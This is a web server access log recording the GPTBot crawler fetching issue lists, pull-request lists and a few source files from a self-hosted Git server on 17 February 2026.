"https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11275] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:19:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11438] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11436] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=rendered" [Client 74.7.227.38] [Length 17071] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:19:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 